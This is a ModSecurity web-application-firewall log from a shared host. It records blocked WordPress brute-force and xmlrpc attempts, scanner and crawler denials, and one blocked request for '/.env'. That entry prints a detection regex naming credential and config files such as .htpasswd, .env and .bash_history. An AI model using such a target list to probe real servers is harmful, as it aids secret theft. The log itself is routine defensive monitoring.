[Tue May 26 18:31:58.815763 2026] [security2:error] [pid 998632:tid 998762] [remote 94.76.235.103:32898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZxq1OTU2dW0MS1EnKyQAAG2g"]
[Tue May 26 18:31:58.981078 2026] [security2:error] [pid 1007701:tid 1007729] [remote 162.214.121.181:54398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.121.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZxg05qHzKMxj0enGcFgAAmhs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:32:00.032468 2026] [security2:error] [pid 1007701:tid 1007886] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZxQ05qHzKMxj0enGcCgAAALw"]
[Tue May 26 18:32:02.135366 2026] [security2:error] [pid 998632:tid 998785] [remote 208.109.188.137:39300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZyq1OTU2dW0MS1EnK6AAAAH4"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 18:32:02.198726 2026] [security2:error] [pid 1007701:tid 1007907] [client 85.208.96.208:22520] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/day/2022-04-25/"] [unique_id "ahWZyg05qHzKMxj0enGcPQAAANE"]
[Tue May 26 18:32:02.198881 2026] [security2:error] [pid 1007701:tid 1007907] [client 85.208.96.208:22520] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/day/2022-04-25/"] [unique_id "ahWZyg05qHzKMxj0enGcPQAAANE"]
[Tue May 26 18:32:02.304981 2026] [security2:error] [pid 1007701:tid 1007734] [remote 74.206.180.196:39820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.180.206.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWZyg05qHzKMxj0enGcPAAA4iA"]
[Tue May 26 18:32:02.354950 2026] [security2:error] [pid 1007701:tid 1007834] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZyA05qHzKMxj0enGcKQAAAIg"]
[Tue May 26 18:32:02.561319 2026] [security2:error] [pid 1007701:tid 1007736] [remote 74.206.180.196:39820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.180.206.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWZyg05qHzKMxj0enGcPwAAwSI"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:32:03.391417 2026] [security2:error] [pid 998632:tid 998796] [client 143.198.114.199:63747] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "sandbox.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWZy61OTU2dW0MS1EnK9QAAAAU"]
[Tue May 26 18:32:04.394699 2026] [security2:error] [pid 1007701:tid 1007733] [remote 167.172.25.98:50012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZzA05qHzKMxj0enGcWgAAoh8"]
[Tue May 26 18:32:05.034880 2026] [security2:error] [pid 1007701:tid 1007740] [remote 167.172.25.98:50012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZzA05qHzKMxj0enGcaAAAyyY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:32:05.538186 2026] [security2:error] [pid 1007701:tid 1007944] [client 47.128.47.135:41602] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/fr/news"] [unique_id "ahWZzQ05qHzKMxj0enGcbgAAAPY"]
[Tue May 26 18:32:06.061670 2026] [security2:error] [pid 998632:tid 998921] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZy61OTU2dW0MS1EnK-AAAAHw"]
[Tue May 26 18:32:06.594981 2026] [security2:error] [pid 1007701:tid 1007919] [client 143.198.114.199:50217] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "sandbox.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWZzg05qHzKMxj0enGcgQAAAN0"]
[Tue May 26 18:32:08.988244 2026] [security2:error] [pid 998632:tid 998917] [client 124.43.5.103:50834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZ0K1OTU2dW0MS1EnLLgAAAHg"]
[Tue May 26 18:32:08.988414 2026] [security2:error] [pid 998632:tid 998917] [client 124.43.5.103:50834] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZ0K1OTU2dW0MS1EnLLgAAAHg"]
[Tue May 26 18:32:09.298773 2026] [security2:error] [pid 1007701:tid 1007931] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZzg05qHzKMxj0enGcegAAAOk"]
[Tue May 26 18:32:11.737317 2026] [security2:error] [pid 1007701:tid 1007849] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ0Q05qHzKMxj0enGcqgAAAJc"]
[Tue May 26 18:32:11.891058 2026] [security2:error] [pid 998632:tid 998680] [remote 121.200.216.55:55870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZ061OTU2dW0MS1EnLRwAAfhk"]
[Tue May 26 18:32:12.432351 2026] [security2:error] [pid 998632:tid 998761] [remote 216.73.216.30:34588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWZ1K1OTU2dW0MS1EnLUgAAY2c"]
[Tue May 26 18:32:12.487345 2026] [security2:error] [pid 1007701:tid 1007844] [client 94.98.43.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ0g05qHzKMxj0enGcsgAAAJI"]
[Tue May 26 18:32:12.680524 2026] [security2:error] [pid 998632:tid 998712] [remote 216.73.216.30:34588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWZ1K1OTU2dW0MS1EnLXAAAYzg"]
[Tue May 26 18:32:14.058495 2026] [security2:error] [pid 998632:tid 998881] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ061OTU2dW0MS1EnLSAAAAFY"]
[Tue May 26 18:32:14.125053 2026] [security2:error] [pid 998632:tid 998917] [client 199.34.84.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZ1q1OTU2dW0MS1EnLcwAAAHg"], referer: https://www.anujtradingco.com/
[Tue May 26 18:32:17.415911 2026] [security2:error] [pid 1007701:tid 1007929] [client 199.34.84.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZ2Q05qHzKMxj0enGdFQAAAOc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467557&moderation-hash=40b05860cbdd81bd5ae1c154b8d08af4
[Tue May 26 18:32:17.608616 2026] [security2:error] [pid 998632:tid 998805] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ1a1OTU2dW0MS1EnLcAAAAA4"]
[Tue May 26 18:32:18.406397 2026] [security2:error] [pid 1007701:tid 1007950] [client 213.218.214.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahWZ2g05qHzKMxj0enGdHQAAAPw"]
[Tue May 26 18:32:18.629514 2026] [security2:error] [pid 1007701:tid 1007849] [client 51.68.247.200:19878] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "rabbanitradingcompany.com"] [uri "/robots.txt"] [unique_id "ahWZ2g05qHzKMxj0enGdJQAAAJc"]
[Tue May 26 18:32:18.629639 2026] [security2:error] [pid 1007701:tid 1007849] [client 51.68.247.200:19878] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "rabbanitradingcompany.com"] [uri "/robots.txt"] [unique_id "ahWZ2g05qHzKMxj0enGdJQAAAJc"]
[Tue May 26 18:32:18.661581 2026] [security2:error] [pid 1007701:tid 1007926] [client 31.57.184.20:59356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-login.php"] [unique_id "ahWZ2g05qHzKMxj0enGdIAAAAOQ"], referer: https://www.facebook.com/
[Tue May 26 18:32:19.145064 2026] [security2:error] [pid 1007701:tid 1007922] [client 31.57.184.20:59889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-login.php"] [unique_id "ahWZ2w05qHzKMxj0enGdMgAAAOA"], referer: https://www.bing.com/
[Tue May 26 18:32:19.184459 2026] [security2:error] [pid 1007701:tid 1007750] [remote 45.79.189.31:15098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahWZ2w05qHzKMxj0enGdMQAAjzA"]
[Tue May 26 18:32:19.687502 2026] [security2:error] [pid 1007701:tid 1007910] [client 124.43.5.103:13477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZ2w05qHzKMxj0enGdPQAAANQ"]
[Tue May 26 18:32:19.687783 2026] [security2:error] [pid 1007701:tid 1007910] [client 124.43.5.103:13477] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZ2w05qHzKMxj0enGdPQAAANQ"]
[Tue May 26 18:32:20.017114 2026] [security2:error] [pid 998632:tid 998847] [client 51.161.37.162:25226] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "rabbanitradingcompany.com"] [uri "/"] [unique_id "ahWZ3K1OTU2dW0MS1EnLmAAAADU"]
[Tue May 26 18:32:20.017377 2026] [security2:error] [pid 998632:tid 998847] [client 51.161.37.162:25226] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "rabbanitradingcompany.com"] [uri "/"] [unique_id "ahWZ3K1OTU2dW0MS1EnLmAAAADU"]
[Tue May 26 18:32:20.224891 2026] [security2:error] [pid 1007701:tid 1007792] [remote 103.50.205.131:56858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.205.50.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZ3A05qHzKMxj0enGdQwAAnlo"]
[Tue May 26 18:32:20.361021 2026] [security2:error] [pid 998632:tid 998677] [remote 91.134.89.60:48754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWZ3K1OTU2dW0MS1EnLmQAAMBc"]
[Tue May 26 18:32:20.412994 2026] [security2:error] [pid 1007701:tid 1007946] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ2Q05qHzKMxj0enGdEAAAAPg"]
[Tue May 26 18:32:20.479424 2026] [security2:error] [pid 1007701:tid 1007793] [remote 49.12.3.147:51690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWZ3A05qHzKMxj0enGdRAAA6Vs"]
[Tue May 26 18:32:22.669378 2026] [security2:error] [pid 1007701:tid 1007862] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ2w05qHzKMxj0enGdPAAAAKQ"]
[Tue May 26 18:32:24.162442 2026] [security2:error] [pid 1007701:tid 1007899] [client 199.34.84.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZ4A05qHzKMxj0enGdcwAAAMk"], referer: https://anujtradingco.com
[Tue May 26 18:32:25.087261 2026] [security2:error] [pid 998632:tid 998741] [remote 216.73.216.30:34588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWZ4a1OTU2dW0MS1EnLuQAAY1U"]
[Tue May 26 18:32:25.293926 2026] [security2:error] [pid 1007701:tid 1007866] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ3g05qHzKMxj0enGdXwAAAKg"]
[Tue May 26 18:32:27.433376 2026] [security2:error] [pid 998632:tid 998716] [remote 216.73.216.30:34588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWZ461OTU2dW0MS1EnLywAAYzw"]
[Tue May 26 18:32:27.928344 2026] [security2:error] [pid 998632:tid 998884] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ4a1OTU2dW0MS1EnLvAAAAFg"]
[Tue May 26 18:32:28.189557 2026] [security2:error] [pid 1007701:tid 1007915] [client 185.255.126.37:53869] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "toronto121mortgage.com"] [uri "/process.php"] [unique_id "ahWZ4w05qHzKMxj0enGdkwAAANk"], referer: http://toronto121mortgage.com/index.php
[Tue May 26 18:32:30.223177 2026] [security2:error] [pid 998632:tid 998852] [client 124.43.5.103:13881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZ5q1OTU2dW0MS1EnL5wAAADo"]
[Tue May 26 18:32:30.223333 2026] [security2:error] [pid 998632:tid 998852] [client 124.43.5.103:13881] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZ5q1OTU2dW0MS1EnL5wAAADo"]
[Tue May 26 18:32:30.453706 2026] [security2:error] [pid 1007701:tid 1007957] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ5A05qHzKMxj0enGdoQAAAQM"]
[Tue May 26 18:32:31.835168 2026] [security2:error] [pid 998632:tid 998751] [remote 216.73.216.30:34588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWZ561OTU2dW0MS1EnL_QAAY18"]
[Tue May 26 18:32:32.995246 2026] [security2:error] [pid 998632:tid 998820] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ5q1OTU2dW0MS1EnL8AAAABw"]
[Tue May 26 18:32:35.240447 2026] [security2:error] [pid 998632:tid 998811] [client 45.12.3.135:55466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 135.3.12.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/images/images/cache.php"] [unique_id "ahWZ661OTU2dW0MS1EnMLwAAABQ"]
[Tue May 26 18:32:35.478983 2026] [security2:error] [pid 998632:tid 998665] [remote 216.73.216.30:34588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWZ661OTU2dW0MS1EnMMwAAYw0"]
[Tue May 26 18:32:35.875298 2026] [security2:error] [pid 998632:tid 998798] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ6a1OTU2dW0MS1EnMHwAAAAc"]
[Tue May 26 18:32:37.958458 2026] [security2:error] [pid 1007701:tid 1007924] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ7A05qHzKMxj0enGd2wAAAOI"]
[Tue May 26 18:32:38.719591 2026] [security2:error] [pid 998632:tid 998746] [remote 44.242.10.134:42017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.10.242.44.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWZ7q1OTU2dW0MS1EnMQQAAVlo"]
[Tue May 26 18:32:39.692406 2026] [security2:error] [pid 1007701:tid 1007926] [client 176.65.139.229:40812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.adityacreations.co.in"] [uri "/.env"] [unique_id "ahWZ7w05qHzKMxj0enGeAQAAAOQ"]
[Tue May 26 18:32:39.796585 2026] [security2:error] [pid 998632:tid 998890] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ761OTU2dW0MS1EnMRwAAAF0"]
